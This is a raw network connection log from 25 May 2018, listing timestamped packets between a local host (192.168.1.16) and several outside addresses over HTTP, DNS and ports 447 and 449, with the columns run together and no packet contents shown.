                Mai 25, 2018 16:04:15.652585030 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.652676105 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:20.071095943 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:20.071182966 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:20.071283102 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:20.071307898 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:20.646050930 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:20.646151066 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:02.503922939 MESZ6497053192.168.1.168.8.8.8
                Mai 25, 2018 16:05:02.820489883 MESZ53649708.8.8.8192.168.1.16
                Mai 25, 2018 16:05:02.920933962 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:02.921024084 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:02.921148062 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.047264099 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.047291994 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.129065990 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.129085064 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.129091024 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.129204035 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.129548073 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.131957054 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.131983042 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.132128954 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.132148981 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.141367912 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.141393900 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.141472101 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.141499043 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152396917 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152415991 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152534962 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152549982 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152559996 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.152569056 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152595997 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152678013 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152690887 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152699947 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152719975 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.152755022 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.152904987 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.155313969 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155330896 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155339956 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155426979 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155441046 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155463934 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.155493021 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.155615091 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.172991991 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173010111 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173019886 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173031092 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173039913 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173135042 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173149109 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173158884 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173171997 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173173904 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.173212051 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173650026 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.173825026 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.173865080 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.175642967 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.175662041 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.175736904 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.175756931 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.185934067 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.185950994 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.185976982 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.185986996 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186045885 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.186068058 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186086893 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186098099 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186109066 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186167002 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.186182976 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186208963 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186232090 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186243057 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186252117 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186260939 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.186300993 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.186317921 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.187062025 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.188776970 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.188802958 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.188812017 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.189002037 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.189033985 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.198210955 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.198254108 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.198450089 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.399040937 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496653080 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.496680975 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496692896 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496701002 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496707916 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496715069 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496721983 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496727943 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496733904 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496741056 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496747017 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496752977 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496758938 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496764898 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496823072 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496854067 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.496884108 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496892929 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496897936 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496901989 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496906996 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496911049 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496925116 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496939898 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.496944904 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496953011 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496972084 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.496979952 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497001886 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497015953 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497025967 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497035980 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497039080 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.497045994 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497057915 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497066975 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497076035 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497083902 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497092962 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497101068 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497109890 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497117043 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.497118950 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497129917 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497142076 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497148037 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497160912 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497169018 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497175932 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497183084 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497189045 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497196913 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.497226000 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.498469114 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.508960962 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.508985996 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.508999109 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509006977 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509016991 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509032965 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509047031 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509054899 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509062052 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509068966 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509076118 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509082079 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509093046 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509099960 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509105921 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509111881 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509119034 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509125948 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509231091 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.509251118 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509260893 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509268045 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509274960 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509280920 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509288073 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509294987 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509305954 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509313107 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509320021 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509325981 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509334087 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509342909 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509349108 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509356022 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509423971 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509452105 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509541988 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.509565115 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509574890 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509582996 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509588003 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509593010 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509598017 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509603977 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509608984 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509613991 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.509618998 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.511063099 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518289089 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518311024 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518323898 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518333912 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518349886 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518357992 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518364906 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518372059 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518378973 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518385887 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518392086 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518399000 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518405914 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518413067 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518419027 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518425941 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518433094 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518439054 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518542051 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518563032 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518572092 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518579960 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518587112 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518594027 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518599987 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518605947 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518663883 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518666029 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518687010 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518702030 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518718958 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518734932 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518749952 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518762112 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518762112 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518775940 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518800974 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518821001 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518832922 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518846989 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518860102 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518861055 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518874884 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518893957 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518908024 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518922091 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518935919 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518944025 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.518946886 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518959045 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.518979073 MESZ804919287.247.241.143192.168.1.16
                Mai 25, 2018 16:05:03.519066095 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.529387951 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:03.529494047 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:05.077542067 MESZ4919280192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:53.830110073 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:54.188940048 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:54.875941038 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:56.079118967 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:05:58.486107111 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:03.297851086 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:12.970216990 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:13.921541929 MESZ5461853192.168.1.168.8.8.8
                Mai 25, 2018 16:06:14.069631100 MESZ53546188.8.8.8192.168.1.16
                Mai 25, 2018 16:06:14.071876049 MESZ6239653192.168.1.168.8.8.8
                Mai 25, 2018 16:06:14.214643955 MESZ53623968.8.8.8192.168.1.16
                Mai 25, 2018 16:06:14.215440035 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.215482950 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.215538025 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.215694904 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.215713024 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.349939108 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.350713968 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.350742102 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.422110081 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.422702074 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.422729015 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.493726969 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.495145082 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.495172024 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.584757090 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.586169004 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.586195946 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.662197113 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.663610935 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:14.663638115 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.741904974 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.943006039 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:14.943113089 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:19.745804071 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:06:19.746061087 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:19.746227026 MESZ4919380192.168.1.1687.247.241.143
                Mai 25, 2018 16:06:19.746253967 MESZ804919387.247.241.143192.168.1.16
                Mai 25, 2018 16:09:08.120750904 MESZ6363853192.168.1.168.8.8.8
                Mai 25, 2018 16:09:08.860121012 MESZ53636388.8.8.8192.168.1.16
                Mai 25, 2018 16:09:08.884736061 MESZ5287753192.168.1.168.8.8.8
                Mai 25, 2018 16:09:09.165577888 MESZ53528778.8.8.8192.168.1.16
                Mai 25, 2018 16:09:09.168193102 MESZ4919480192.168.1.16216.239.34.21
                Mai 25, 2018 16:09:09.168261051 MESZ8049194216.239.34.21192.168.1.16
                Mai 25, 2018 16:09:09.168404102 MESZ4919480192.168.1.16216.239.34.21
                Mai 25, 2018 16:09:09.169472933 MESZ4919480192.168.1.16216.239.34.21
                Mai 25, 2018 16:09:09.169509888 MESZ8049194216.239.34.21192.168.1.16
                Mai 25, 2018 16:09:10.098851919 MESZ8049194216.239.34.21192.168.1.16
                Mai 25, 2018 16:09:10.299015999 MESZ8049194216.239.34.21192.168.1.16
                Mai 25, 2018 16:09:10.299170971 MESZ4919480192.168.1.16216.239.34.21
                Mai 25, 2018 16:09:10.303174019 MESZ4919480192.168.1.16216.239.34.21
                Mai 25, 2018 16:09:11.970244884 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:11.970336914 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:11.970439911 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:12.096308947 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:12.096374989 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:13.249583006 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:13.292937040 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:13.292999983 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:13.954665899 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:14.157207966 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:15.074230909 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:15.074286938 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:15.084429026 MESZ5936253192.168.1.168.8.8.8
                Mai 25, 2018 16:09:15.469989061 MESZ53593628.8.8.8192.168.1.16
                Mai 25, 2018 16:09:15.485255003 MESZ5226153192.168.1.168.8.8.8
                Mai 25, 2018 16:09:15.637794018 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:15.771600008 MESZ53522618.8.8.8192.168.1.16
                Mai 25, 2018 16:09:15.883027077 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:15.883215904 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:16.781426907 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:16.781472921 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:17.460038900 MESZ4494919592.55.251.211192.168.1.16
                Mai 25, 2018 16:09:17.673018932 MESZ49195449192.168.1.1692.55.251.211
                Mai 25, 2018 16:09:18.711720943 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:18.711772919 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:18.711879969 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:18.713084936 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:18.713109970 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:19.249706030 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:19.281433105 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:19.281487942 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:19.695291996 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:19.899019003 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:19.899216890 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.101613998 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.101646900 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.768655062 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.768692017 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.768704891 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.768918991 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.769936085 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.769958973 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.770111084 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.771370888 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.771389961 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.771527052 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.830389977 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.830425024 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.830435038 MESZ4474919782.202.221.37192.168.1.16
                Mai 25, 2018 16:09:20.830579996 MESZ49197447192.168.1.1682.202.221.37
                Mai 25, 2018 16:09:20.833062887 MESZ4474919782.202.221.37192.168.1.16
